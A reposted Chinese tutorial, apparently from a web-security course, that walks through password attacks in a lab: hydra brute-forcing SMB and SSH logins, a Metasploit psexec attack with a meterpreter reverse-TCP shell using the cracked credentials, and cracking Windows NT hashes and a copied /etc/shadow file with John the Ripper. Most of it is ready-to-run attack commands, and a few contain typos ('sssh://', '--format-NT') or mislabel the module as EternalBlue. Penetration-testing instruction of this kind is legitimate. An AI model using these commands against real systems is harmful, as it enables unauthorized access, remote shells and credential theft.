Web安全第 06 讲:密码爆破工具hydra(kali)

Web安全第 06 讲:密码爆破工具hydra(kali),第1张

Web安全第 06 讲:密码爆破工具hydra(kali) 1.1、windows系统口令远程爆破(smb服务,445端口)

命令:hydra -l administrator -P pwd.dic smb://10.211.55.8 -vV -f -e nsr

解析:-l指定用户名,-L指定用户名字典,-p指定密码,-P指定密码字典,-vV显示爆破细节,-o将爆破结果保存到文件,-f只要找到正确密码就停止爆破,-t指定线程数量,默认16,-e(n、s、r)n:null,s:same、r:反向

创建用户名和口令文件:

vim user.dic

vim pwd.dic

 暴力破解成功,用户名qin,密码1221

使用永恒之蓝尝试连接:

命令:msfconsole

执行:use exploit/windows/smb/psexec_psh

执行命令:set payload windows/x64/meterpreter/reverse_tcp

执行命令,设置远程目标:set RHOSTS 10.211.55.8

执行命令,设置用户名:set SMBUSER qin

执行命令,设置密码:set SMBPASS 1221

执行命令,设置本机地址:set LHOST 10.211.55.12

执行命令,攻击:exploit

6.2、Linux系统口令远程爆破(ssh服务,22端口)

主要爆破ssh服务

命令:hydra -L user.dic -P pwd.dic sssh://10.211.55.6 -vV -f -t64 -ensr

暴力破解成功,用户名root,密码Aa123123.

6.3、windows系统本地爆破 6.3.1、从内存中读取windows密码

 

6.3.2、windows的hash值破解(kali)

命令:john win2k8.hash --format-NT --wordlist=/root/dic/winPass.dic

解释:win2k8.hash是存hash的文件,--worldlist可选参数,如果不写就会用默认字典爆破

6.4、Linux系统本地爆破

拷贝shadow文件:cp /etc/shadow ./shadow

命令:john shadow

解析:shadow是拷贝过来的密码文件

命令:john --show shadow

解析:查看破解后的文件

 

欢迎分享,转载请注明来源:内存溢出

原文地址:https://54852.com/zaji/5695062.html

(0)
打赏 微信扫一扫微信扫一扫 支付宝扫一扫支付宝扫一扫
上一篇 2022-12-17
下一篇2022-12-17

发表评论

登录后才能评论

评论列表(0条)

    保存